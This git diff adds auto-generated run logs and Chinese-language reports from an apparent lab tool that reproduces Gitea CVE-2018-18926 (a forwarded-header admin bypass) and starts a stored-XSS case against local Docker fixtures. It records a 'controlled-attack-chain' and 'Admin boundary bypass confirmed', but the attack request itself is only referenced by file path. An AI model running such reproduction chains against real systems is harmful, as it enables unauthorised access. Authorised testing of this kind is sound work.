diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json
new file mode 100644
index 00000000..fe6e7072
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json
@@ -0,0 +1,5 @@
+{
+  "url": "http://127.0.0.1:18101/",
+  "title": "Gitea Proxy Boundary Fixture",
+  "body_excerpt": "\n  \n    Gitea Proxy Boundary Fixture\n    Forwarded header trust boundary and admin gate fixture.\n    Baseline ready\n    System: gitea / Family: proxy-boundary\n    \n    \n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json
new file mode 100644
index 00000000..f0d7dbb1
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json
@@ -0,0 +1,24 @@
+{
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18101/",
+      "status_code": 200,
+      "headers": {
+        "Server": "BaseHTTP/0.6 Python/3.12.13",
+        "Date": "Wed, 18 Mar 2026 01:25:42 GMT",
+        "Content-Type": "text/html; charset=utf-8",
+        "Content-Length": "1010"
+      },
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Proxy Boundary Fixture</title>\n  <style>\n    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }\n    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radi"
+    }
+  ],
+  "steps": [
+    {
+      "kind": "http-get",
+      "status": "completed",
+      "path": "/",
+      "status_code": 200,
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Proxy Boundary Fixture</title>\n  <style>\n    b"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log
new file mode 100644
index 00000000..e69de29b
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/doctor.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/doctor.json
new file mode 100644
index 00000000..397569ce
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/doctor.json
@@ -0,0 +1,44 @@
+{
+  "status": "passed",
+  "ok": true,
+  "checks": [
+    {
+      "name": "docker-cli",
+      "ok": true,
+      "detail": "docker CLI available"
+    },
+    {
+      "name": "docker-daemon",
+      "ok": true,
+      "detail": "context=desktop-linux"
+    },
+    {
+      "name": "playwright-import",
+      "ok": true,
+      "detail": "playwright Python package import passed"
+    },
+    {
+      "name": "playwright-browser",
+      "ok": true,
+      "detail": "chromium runtime launch passed"
+    },
+    {
+      "name": "ports",
+      "ok": true,
+      "detail": "checked 1 host port bindings",
+      "bindings": [
+        {
+          "profile_id": "gitea-proxy-boundary",
+          "service": "app",
+          "binding": "18101:3000",
+          "port": 18101
+        }
+      ]
+    }
+  ],
+  "profile_ids": [
+    "gitea-proxy-boundary"
+  ],
+  "failure_count": 0,
+  "summary": "all checks passed"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-browser.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-browser.json
new file mode 100644
index 00000000..c7f2e209
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Gitea Proxy Boundary Fixture - proof",
+  "page_url": "http://127.0.0.1:18101/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json
new file mode 100644
index 00000000..e2a9239d
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18101/"
+  }
+]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json
new file mode 100644
index 00000000..36fdd8d4
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json
@@ -0,0 +1,5 @@
+{
+  "url": "http://127.0.0.1:18101/",
+  "title": "Gitea Proxy Boundary Fixture - proof",
+  "body_excerpt": "\n  \n    Gitea Proxy Boundary Fixture\n    Forwarded header trust boundary and admin gate fixture.\n    Proof active: trusted forwarded headers crossed the boundary\n    System: gitea / Family: proxy-boundary\n    Admin boundary bypass confirmed.\n    \n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/ready.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/ready.json
new file mode 100644
index 00000000..2aa832b3
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/ready.json
@@ -0,0 +1,12 @@
+{
+  "status": "completed",
+  "detail": "baseline urls ready (1)",
+  "elapsed_seconds": 0.0,
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18101/",
+      "status_code": 200
+    }
+  ],
+  "compose_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/seed.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/seed.json
new file mode 100644
index 00000000..5607e05e
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/seed.json
@@ -0,0 +1,21 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "detail": "fixture seeded"
+    }
+  ],
+  "seeded": true,
+  "result": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "fixture seeded",
+      "case_id": "gitea--CVE-2018-18926"
+    }
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html
new file mode 100644
index 00000000..5a1f71dd
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html
@@ -0,0 +1,62 @@
+<!doctype html>
+<html><head><meta charset='utf-8'><title>websafe 运行报告</title>
+<style>body{font-family:ui-sans-serif,system-ui,sans-serif;margin:2rem;line-height:1.55;background:#f8fafc;color:#0f172a;} code,pre{background:#e2e8f0;padding:.2rem .4rem;border-radius:.3rem;} pre{white-space:pre-wrap;} .grid{display:grid;grid-template-columns:repeat(2,minmax(0,1fr));gap:1rem;} .card{border:1px solid #cbd5e1;padding:1rem;border-radius:.75rem;background:#fff;} table{width:100%;border-collapse:collapse;background:#fff;border:1px solid #cbd5e1;border-radius:.75rem;overflow:hidden;} th,td{padding:.75rem;border-bottom:1px solid #e2e8f0;text-align:left;vertical-align:top;} img{max-width:100%;border:1px solid #cbd5e1;border-radius:.5rem;} .gallery{display:grid;grid-template-columns:repeat(auto-fit,minmax(320px,1fr));gap:1rem;}</style>
+</head><body>
+<h1>运行 gitea-gitea--CVE-2018-18926-20260318012526</h1>
+<div class='grid'>
+<div class='card'><strong>漏洞条目</strong><br><code>gitea--CVE-2018-18926</code></div>
+<div class='card'><strong>实证状态</strong><br><code>verified-real</code></div>
+<div class='card'><strong>复现 Profile</strong><br><code>gitea-proxy-boundary</code></div>
+<div class='card'><strong>Artifact 模式</strong><br><code>local-fixture</code></div>
+</div>
+<h2>Mermaid 时间线</h2>
+<pre>flowchart LR
+A[&quot;选择 Advisory&quot;] --&gt; B[&quot;解析 Repro Profile&quot;]
+B --&gt; C[&quot;生成 Compose 环境&quot;]
+C --&gt; D[&quot;采集基线快照&quot;]
+D --&gt; E[&quot;执行受控攻击步骤&quot;]
+E --&gt; F[&quot;浏览器回放验证&quot;]
+F --&gt; G[&quot;收集日志与证据&quot;]
+G --&gt; H[&quot;回写 Registry 与报告&quot;]</pre>
+<h2>运行时间线</h2>
+<table><thead><tr><th>时间</th><th>步骤</th><th>状态</th><th>说明</th></tr></thead><tbody>
+<tr><td><code>2026-03-18T01:25:26+00:00</code></td><td><code>select-advisory</code></td><td><code>completed</code></td><td>gitea--CVE-2018-18926</td></tr>
+<tr><td><code>2026-03-18T01:25:26+00:00</code></td><td><code>resolve-repro-profile</code></td><td><code>completed</code></td><td>gitea-proxy-boundary</td></tr>
+<tr><td><code>2026-03-18T01:25:27+00:00</code></td><td><code>doctor</code></td><td><code>completed</code></td><td>all checks passed</td></tr>
+<tr><td><code>2026-03-18T01:25:41+00:00</code></td><td><code>provision-compose-environment</code></td><td><code>ready</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:25:42+00:00</code></td><td><code>wait-ready</code></td><td><code>completed</code></td><td>baseline urls ready (1)</td></tr>
+<tr><td><code>2026-03-18T01:25:42+00:00</code></td><td><code>seed-environment</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:25:42+00:00</code></td><td><code>baseline-snapshot</code></td><td><code>completed</code></td><td>urls=1</td></tr>
+<tr><td><code>2026-03-18T01:25:42+00:00</code></td><td><code>browser-replay-before-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:25:42+00:00</code></td><td><code>controlled-attack-chain</code></td><td><code>completed</code></td><td>steps=1</td></tr>
+<tr><td><code>2026-03-18T01:25:43+00:00</code></td><td><code>browser-replay-after-attack</code></td><td><code>completed</code></td><td>-</td></tr>
+<tr><td><code>2026-03-18T01:25:43+00:00</code></td><td><code>collect-logs-and-evidence</code></td><td><code>completed</code></td><td>container_logs=1</td></tr>
+<tr><td><code>2026-03-18T01:25:45+00:00</code></td><td><code>cleanup-compose-environment</code></td><td><code>completed</code></td><td>docker compose down completed</td></tr>
+<tr><td><code>2026-03-18T01:25:45+00:00</code></td><td><code>update-registry-and-reports</code></td><td><code>completed</code></td><td>gitea-gitea--CVE-2018-18926-20260318012526</td></tr>
+</tbody></table>
+<h2>攻击步骤</h2>
+<table><thead><tr><th>工具</th><th>状态</th><th>输出</th></tr></thead><tbody>
+<tr><td><code>gitea.proxy-boundary</code></td><td><code>completed</code></td><td><code>/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json</code></td></tr>
+</tbody></table>
+<h2>浏览器截图</h2>
+<div class='gallery'>
+<figure><img src='assets/baseline.png' alt='baseline'><figcaption><code>assets/baseline.png</code></figcaption></figure>
+<figure><img src='assets/proof.png' alt='proof'><figcaption><code>assets/proof.png</code></figcaption></figure>
+</div>
+<h2>证据清单</h2><ul>
+<li><code>compose/compose.yaml</code></li>
+<li><code>assets/baseline.png</code></li>
+<li><code>assets/baseline-dom.html</code></li>
+<li><code>logs/baseline-console.json</code></li>
+<li><code>logs/baseline-network.json</code></li>
+<li><code>logs/baseline-page.json</code></li>
+<li><code>assets/proof.png</code></li>
+<li><code>assets/proof-dom.html</code></li>
+<li><code>logs/proof-console.json</code></li>
+<li><code>logs/proof-network.json</code></li>
+<li><code>logs/proof-page.json</code></li>
+<li><code>logs/docker/app.log</code></li>
+<li><code>logs/attack.json</code></li>
+<li><code>logs/baseline.json</code></li>
+</ul>
+</body></html>
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md
new file mode 100644
index 00000000..c82a9448
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md
@@ -0,0 +1,86 @@
+# 运行 gitea-gitea--CVE-2018-18926-20260318012526
+
+> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | 自动生成 run bundle
+
+- 漏洞条目: `gitea--CVE-2018-18926`
+- 系统: `gitea`
+- Repro Profile: `gitea-proxy-boundary`
+- 实证状态: `verified-real`
+- 实证方式: `real`
+- Artifact 模式: `local-fixture`
+- 启动时间: `2026-03-18T01:25:26+00:00`
+- 完成时间: `2026-03-18T01:25:45+00:00`
+- 阻塞原因: `-`
+- Compose 服务: `app`
+
+## 运行时间线
+
+- Mermaid: [timeline.mmd](/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd)
+
+| 时间 | 步骤 | 状态 | 说明 |
+|------|------|------|------|
+| `2026-03-18T01:25:26+00:00` | `select-advisory` | `completed` | gitea--CVE-2018-18926 |
+| `2026-03-18T01:25:26+00:00` | `resolve-repro-profile` | `completed` | gitea-proxy-boundary |
+| `2026-03-18T01:25:27+00:00` | `doctor` | `completed` | all checks passed |
+| `2026-03-18T01:25:41+00:00` | `provision-compose-environment` | `ready` | - |
+| `2026-03-18T01:25:42+00:00` | `wait-ready` | `completed` | baseline urls ready (1) |
+| `2026-03-18T01:25:42+00:00` | `seed-environment` | `completed` | steps=1 |
+| `2026-03-18T01:25:42+00:00` | `baseline-snapshot` | `completed` | urls=1 |
+| `2026-03-18T01:25:42+00:00` | `browser-replay-before-attack` | `completed` | - |
+| `2026-03-18T01:25:42+00:00` | `controlled-attack-chain` | `completed` | steps=1 |
+| `2026-03-18T01:25:43+00:00` | `browser-replay-after-attack` | `completed` | - |
+| `2026-03-18T01:25:43+00:00` | `collect-logs-and-evidence` | `completed` | container_logs=1 |
+| `2026-03-18T01:25:45+00:00` | `cleanup-compose-environment` | `completed` | docker compose down completed |
+| `2026-03-18T01:25:45+00:00` | `update-registry-and-reports` | `completed` | gitea-gitea--CVE-2018-18926-20260318012526 |
+
+## Compose 拓扑
+
+- Compose 文件: `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml`
+- 服务列表: `app`
+
+## 攻击步骤
+
+| 工具/步骤 | 状态 | 结果 |
+|-----------|------|------|
+| `gitea.proxy-boundary` | `completed` | `/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json` |
+
+## 证据摘要
+
+- Baseline: `1`
+- 攻击步骤: `1`
+- 浏览器证据: `10`
+- 容器日志: `1`
+- 请求日志: `2`
+
+## 浏览器截图
+
+![baseline](assets/baseline.png)
+![proof](assets/proof.png)
+
+## 浏览器证据
+
+- `assets/baseline.png`
+- `assets/baseline-dom.html`
+- `logs/baseline-console.json`
+- `logs/baseline-network.json`
+- `logs/baseline-page.json`
+- `assets/proof.png`
+- `assets/proof-dom.html`
+- `logs/proof-console.json`
+- `logs/proof-network.json`
+- `logs/proof-page.json`
+
+## 容器日志
+
+- `logs/docker/app.log`
+
+## 请求与基线日志
+
+- `logs/attack.json`
+- `logs/baseline.json`
+
+## 最小化验证说明
+
+- 仅限自有资产、本地靶场或已授权实验目标。
+- 默认执行 minimal-proof；不会把破坏性或不可回滚动作作为默认路径。
+- 若浏览器证据缺失，前端类案例不会被标为 `verified-*`。
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/run.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/run.json
new file mode 100644
index 00000000..255a769d
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/run.json
@@ -0,0 +1,197 @@
+{
+  "run_id": "gitea-gitea--CVE-2018-18926-20260318012526",
+  "system_id": "gitea",
+  "advisory_id": "gitea--CVE-2018-18926",
+  "repro_profile_id": "gitea-proxy-boundary",
+  "verification_status": "verified-real",
+  "verification_mode": "real",
+  "artifact_mode": "local-fixture",
+  "target_env": "local-docker",
+  "compose_services": [
+    "app"
+  ],
+  "baseline_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
+  ],
+  "attack_steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.proxy-boundary",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json"
+    }
+  ],
+  "browser_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+  ],
+  "browser_evidence": {
+    "required": true,
+    "present": true,
+    "refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+    ],
+    "baseline_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/baseline-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline-page.json"
+    ],
+    "proof_refs": [
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof.png",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/assets/proof-dom.html",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-console.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-network.json",
+      "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/proof-page.json"
+    ],
+    "baseline_title": "Gitea Proxy Boundary Fixture",
+    "proof_title": "Gitea Proxy Boundary Fixture - proof",
+    "error_kind": null,
+    "reason": null
+  },
+  "container_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/docker/app.log"
+  ],
+  "request_log_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/attack.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/logs/baseline.json"
+  ],
+  "compose_refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/compose/compose.yaml"
+  ],
+  "timeline": [
+    {
+      "at": "2026-03-18T01:25:26+00:00",
+      "step": "select-advisory",
+      "status": "completed",
+      "detail": "gitea--CVE-2018-18926"
+    },
+    {
+      "at": "2026-03-18T01:25:26+00:00",
+      "step": "resolve-repro-profile",
+      "status": "completed",
+      "detail": "gitea-proxy-boundary"
+    },
+    {
+      "at": "2026-03-18T01:25:27+00:00",
+      "step": "doctor",
+      "status": "completed",
+      "detail": "all checks passed"
+    },
+    {
+      "at": "2026-03-18T01:25:41+00:00",
+      "step": "provision-compose-environment",
+      "status": "ready",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "wait-ready",
+      "status": "completed",
+      "detail": "baseline urls ready (1)"
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "seed-environment",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "baseline-snapshot",
+      "status": "completed",
+      "detail": "urls=1"
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "browser-replay-before-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:25:42+00:00",
+      "step": "controlled-attack-chain",
+      "status": "completed",
+      "detail": "steps=1"
+    },
+    {
+      "at": "2026-03-18T01:25:43+00:00",
+      "step": "browser-replay-after-attack",
+      "status": "completed",
+      "detail": ""
+    },
+    {
+      "at": "2026-03-18T01:25:43+00:00",
+      "step": "collect-logs-and-evidence",
+      "status": "completed",
+      "detail": "container_logs=1"
+    },
+    {
+      "at": "2026-03-18T01:25:45+00:00",
+      "step": "cleanup-compose-environment",
+      "status": "completed",
+      "detail": "docker compose down completed"
+    },
+    {
+      "at": "2026-03-18T01:25:45+00:00",
+      "step": "update-registry-and-reports",
+      "status": "completed",
+      "detail": "gitea-gitea--CVE-2018-18926-20260318012526"
+    }
+  ],
+  "success_evaluation": {
+    "passed": true,
+    "verification_status": "verified-real",
+    "blocked_reason": null,
+    "assertions": [
+      {
+        "name": "baseline-ok",
+        "kind": "baseline-ok",
+        "passed": true,
+        "detail": "baseline URLs responded without 5xx or transport errors"
+      },
+      {
+        "name": "runner-success",
+        "kind": "runner-success",
+        "passed": true,
+        "detail": "trusted forwarded headers crossed the boundary"
+      },
+      {
+        "name": "browser-present",
+        "kind": "browser-present",
+        "passed": true,
+        "detail": "browser evidence captured"
+      }
+    ]
+  },
+  "historical_status": "verified-real",
+  "latest_status": "verified-real",
+  "started_at": "2026-03-18T01:25:26+00:00",
+  "finished_at": "2026-03-18T01:25:45+00:00",
+  "blocked_reason": null,
+  "report_refs": {
+    "bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526",
+    "report_md": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.md",
+    "report_html": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/report.html",
+    "timeline": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd"
+  }
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd
new file mode 100644
index 00000000..71155437
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2018-18926-20260318012526/timeline.mmd
@@ -0,0 +1,8 @@
+flowchart LR
+A["选择 Advisory"] --> B["解析 Repro Profile"]
+B --> C["生成 Compose 环境"]
+C --> D["采集基线快照"]
+D --> E["执行受控攻击步骤"]
+E --> F["浏览器回放验证"]
+F --> G["收集日志与证据"]
+G --> H["回写 Registry 与报告"]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html
new file mode 100644
index 00000000..50bc4932
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline-dom.html
@@ -0,0 +1,26 @@
+<!DOCTYPE html><html lang="zh-CN"><head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+  <title>Gitea Stored XSS Fixture</title>
+  <style>
+    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }
+    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: 16px; padding: 24px; }
+    .proof { padding: 14px; border-radius: 12px; background: #14532d; color: #dcfce7; }
+    .baseline { padding: 14px; border-radius: 12px; background: #1e3a8a; color: #dbeafe; }
+    code { background: rgba(255,255,255,0.08); padding: 2px 6px; border-radius: 6px; }
+  </style>
+</head>
+<body>
+  <main>
+    <h1>Gitea Stored XSS Fixture</h1>
+    <p>Stored payload rendering path for browser proof capture.</p>
+    <div class="baseline">Baseline ready</div>
+    <p>System: <code>gitea</code> / Family: <code>xss</code></p>
+    
+    
+    
+    
+    
+  </main>
+
+</body></html>
\ No newline at end of file
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png b/06-case-studies/generated-runs/gitea-gitea--CVE-2019-1010261-20260318012624/assets/baseline.png
new file mode 100644
index 0000000000000000000000000000000000000000..450c77a3cb700df5d649e920114849209880a55c
GIT binary patch
literal 27148
zcmd?RS6EY7_&16(qo@d|2&f1QqM{(6AcW2gh$u*trc_aS3q3#}QE8$AN|io{^eQd1
zBn+TPmtI5YodgIZfwZ%jbN=Uf&egg4F1~ZFU~hS{aPPI=_t##c4fVA-PhURG#>U3^
z=;8e*Y;4EDx4->5`5XB1m$1$;Hny{DkM93%5}2`xJC(stVzF<pje9g1WUiil;`i`m
z-j#@-=ek0dF^okF(dyHMa~g#6J}WmL=`3O56Q%r~cr?{A)TdG^DsUbimaWJv1AK>?
z<Fc|Wz5#Q9Sym;b4ko$D#elVDSxtlIz}NOyY-hmAw@<blUA+0<^r9#GYhFP?%B=(=
zc~R9|_tXy`2J?olvawN#PrqG-2RSb9_BeE>I5<k$W@RSv{!9GhIl{Q?$AhF|)9z;t
zGHwS|+r;nl2kH(Ej^$PjSAS!B#fp8Br&Hi$A0Ds&y(?+3J5lmk)#8`qBz`*G_YWhJ
zFFs}Y=XT7LB+L44q)R<(_8OpPo0VDc9%E}^@n6?TEVK&E-Q|_&Pg4tBIz5tEFOg(q
zm;3f&$&)gRm`Q&`#y(@vmQS0FZJVXPJb1l3MY62PCF~bEWTNWrMV?nL%WN1Y6cr^9
z83&<#T}j|I(ba2xmfn5mST-$u+Mu(48GGB}!a4Kbyh0-OngZvVzjI7;9Rn}%w&kIl
z$<<<;lDacjEPwNQY+7U{IgH4&Wn+7B-7Uy5I90~QLB@(h(BQi0e1V^ZMPBg;AN`&f
